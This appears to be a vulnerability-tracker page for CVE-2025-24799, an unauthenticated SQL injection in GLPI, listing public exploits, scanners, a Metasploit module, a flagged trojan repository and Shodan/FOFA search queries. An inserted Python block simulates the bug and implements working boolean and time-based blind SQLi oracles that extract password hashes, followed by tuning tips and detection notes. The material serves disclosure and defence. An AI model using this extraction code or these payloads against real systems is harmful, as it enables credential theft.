CVE-2025-24799

HIGH · EXPLOITED · NUCLEI

GLPI 10.0.0-10.0.17 - Unauthenticated SQL Injection via Inventory Endpoint


Exploitation Summary

CVE-2025-24799 has been observed exploited in the wild (reported by VulnCheck KEV). EIP tracks 5 public exploits from researchers including MatheuZSecurity, MuhammadWaseem29 and airbus-cert, plus the Metasploit module auxiliary/gather/glpi_inventory_plugin_unauth_sqli. A Nuclei detection template is also available.

AI-analyzed exploit summary: This is a functional exploit for CVE-2025-24799, an unauthenticated SQL injection vulnerability in GLPI. It uses time-based blind SQL injection to extract user credentials from the 'glpi_users' table.

Description

GLPI is a free asset and IT management software package. An unauthenticated user can perform a SQL injection through the inventory endpoint. This vulnerability is fixed in 10.0.18.

Exploits (5)

nomisec WORKING POC 33 stars
by MatheuZSecurity · infoleak
https://github.com/MatheuZSecurity/Exploit-CVE-2025-24799

This is a functional exploit for CVE-2025-24799, an unauthenticated SQL injection vulnerability in GLPI. It uses time-based blind SQL injection to extract user credentials from the 'glpi_users' table.

Classification
Working Poc 95%
Attack Type
Sqli
Complexity
Moderate
Reliability
Reliable
Target: GLPI (version not specified)
No auth needed
Prerequisites: Target URL with vulnerable endpoint · Network access to the target
devstral-2 · analyzed Feb 16, 2026
nomisec SCANNER 5 stars
by MuhammadWaseem29 · infoleak
https://github.com/MuhammadWaseem29/CVE-2025-24799

This repository contains a Python-based SQL injection scanner designed to detect CVE-2025-24799 vulnerabilities using time-based SQLi techniques with multithreading. The tool scans URLs for SQLi vulnerabilities by injecting a payload that induces a time delay, confirming vulnerability if the delay exceeds a threshold.

Classification
Scanner 90%
Attack Type
Sqli
Complexity
Moderate
Reliability
Reliable
Target: GLPI (version not specified; the scanner is written for the CVE-2025-24799 endpoint)
No auth needed
Prerequisites: Python 3.x · requests library · colorama library · target URLs
devstral-2 · analyzed Feb 16, 2026
nomisec SCANNER
by airbus-cert · infoleak
https://github.com/airbus-cert/CVE-2025-24799-scanner

This repository contains a Python-based scanner for detecting SQL injection vulnerability (CVE-2025-24799) in GLPI software. The scanner uses time-based blind SQL injection to test for vulnerability by measuring response delays.

Classification
Scanner 95%
Attack Type
Sqli
Complexity
Moderate
Reliability
Reliable
Target: GLPI (version not specified)
No auth needed
Prerequisites: Network access to the target GLPI instance · Target endpoint must be reachable at /index.php/ajax/
devstral-2 · analyzed Feb 16, 2026
nomisec TROJAN
by Rosemary1337 · poc
https://github.com/Rosemary1337/CVE-2025-24799

The repository claims to be a PoC for CVE-2025-24799 targeting GLPI with SQL injection, but the main.py file contains obfuscated payloads unrelated to the stated vulnerability, indicating deception.

Classification
Trojan 95%
Attack Type
Other
Complexity
Moderate
Reliability
Theoretical
Target: GLPI
No auth needed
devstral-2 · analyzed Feb 16, 2026
metasploit WORKING POC
by rz, jheysel-r7 · rubypoc
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/glpi_inventory_plugin_unauth_sqli.rb

This Metasploit module exploits an unauthenticated blind boolean SQL injection vulnerability in GLPI's Inventory plugin by sending maliciously crafted XML payloads to dump sensitive data such as usernames and password hashes.

Classification
Working Poc 100%
Attack Type
Sqli
Complexity
Moderate
Reliability
Reliable
Target: GLPI 10.0.0-10.0.17 (fixed in 10.0.18) with Inventory plugin enabled
No auth needed
Prerequisites: GLPI Inventory plugin installed and enabled · Inventory feature enabled in administration configuration
devstral-2 · analyzed Feb 16, 2026
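The five entries above describe two flavours of the same technique: the scanners confirm the bug by injecting a condition that triggers a measurable delay, and the working PoCs turn a true/false (or slow/fast) response difference into an oracle and recover rows from glpi_users one character at a time. The following is an added, self-contained illustration of that workflow, not code from the page or from any of the listed repositories. It does not reproduce GLPI's real inventory endpoint or the real payload: the vulnerable query, the glpi_agents table, the "agent known?" response difference and the sample rows are all assumptions of this simulation, with MySQL-style ASCII() and SLEEP() registered on an in-memory SQLite database so MySQL-syntax payloads run unchanged.

```python
import sqlite3
import time
from typing import Callable

# Constructed sample rows standing in for glpi_users; the hashes are placeholders, not real credentials.
SAMPLE_USERS = [
    (2, "glpi", "$2y$10$placeholderhashAAAAAAAAAA"),
    (3, "tech", "$2y$10$placeholderhashBBBBBBBBBB"),
]


def make_vulnerable_target() -> Callable[[str], bool]:
    """Build a simulated SQLi-vulnerable endpoint backed by in-memory SQLite.

    The query below is an assumed stand-in for a CWE-89 bug (string concatenation
    of attacker input); it is NOT GLPI's real inventory code. MySQL's ASCII() and
    SLEEP() are registered so MySQL-style payloads run unchanged against SQLite.
    """
    conn = sqlite3.connect(":memory:")
    conn.create_function("ASCII", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function("SLEEP", 1, lambda seconds: time.sleep(seconds) or 0)
    conn.execute("CREATE TABLE glpi_users (id INTEGER, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO glpi_users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.execute("CREATE TABLE glpi_agents (id INTEGER, deviceid TEXT)")
    conn.execute("INSERT INTO glpi_agents VALUES (1, 'agent-0001')")

    def endpoint(deviceid: str) -> bool:
        # Vulnerable pattern: caller-controlled device id concatenated into the SQL text.
        sql = "SELECT id FROM glpi_agents WHERE deviceid = '" + deviceid + "'"
        return conn.execute(sql).fetchone() is not None  # "agent known?" is the observable

    return endpoint


def boolean_oracle(endpoint: Callable[[str], bool]) -> Callable[[str], bool]:
    """Turn a visible true/false response difference into an oracle for SQL conditions."""
    return lambda cond: endpoint("x' OR (" + cond + ") -- ")


def timing_oracle(endpoint: Callable[[str], bool], delay: float = 0.25,
                  threshold: float = 0.1) -> Callable[[str], bool]:
    """Oracle that infers the condition from response time (the time-based variant).

    The scanners on this page work the same way: a true condition costs `delay`
    seconds, and anything slower than `threshold` is read as true.
    """
    def ask(cond: str) -> bool:
        start = time.monotonic()
        endpoint("x' OR (CASE WHEN (" + cond + ") THEN SLEEP(" + str(delay) + ") ELSE 0 END) -- ")
        return time.monotonic() - start > threshold
    return ask


def confirm_injectable(oracle: Callable[[str], bool]) -> bool:
    """Scanner sanity check: a usable oracle must separate a true from a false condition."""
    return oracle("1=1") and not oracle("1=2")


def extract_string(oracle: Callable[[str], bool], subquery: str, max_len: int = 64) -> str:
    """Recover the single-row, single-column result of `subquery` one character at a time.

    Each character costs about 7 oracle queries (binary search over 0..127).
    ASCII('') is 0 in both MySQL and SQLite, which marks the end of the string.
    """
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"ASCII(SUBSTR(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


def dump_user(oracle: Callable[[str], bool], name: str) -> tuple:
    """Return (name, password hash) for one glpi_users row via the blind oracle."""
    sub = f"SELECT password FROM glpi_users WHERE name = '{name}'"
    return name, extract_string(oracle, sub)


if __name__ == "__main__":
    target = make_vulnerable_target()
    fast = boolean_oracle(target)
    print("boolean oracle usable:", confirm_injectable(fast))
    print("timing oracle usable:", confirm_injectable(timing_oracle(target)))
    print(dump_user(fast, "glpi"))
```

The boolean oracle is what the Metasploit module relies on and is the one to prefer when any response difference exists, since it is deterministic and about an order of magnitude cheaper per character than sleeping; the timing oracle is the fallback the scanners use when the response body is identical either way, and its threshold must be set against a measured baseline, not a fixed constant, or latency jitter will produce false positives. Detection-side, both variants leave the same trace: a burst of near-identical requests to the inventory endpoint whose bodies contain SQL keywords (ASCII, SUBSTR, SLEEP, CASE WHEN) and that differ only in a numeric comparison value.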

Nuclei Templates (1)

GLPI < 10.0.17 - Pre-Auth SQL Injection
CRITICAL · VERIFIED · by ritikchaddha
Shodan: title:"GLPI"
FOFA: title="GLPI"


Scores

CVSS v3 7.5
EPSS 0.2884
EPSS Percentile 96.7%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CISA SSVC

Vulnrichment
Exploitation none
Automatable yes
Technical Impact partial

Details

VulnCheck KEV 2025-04-17
CWE
CWE-89
Status published
Products (1)
glpi-project/glpi 10.0.0 - 10.0.17 (fixed in 10.0.18)
Published Mar 18, 2025
Tracked Since Feb 18, 2026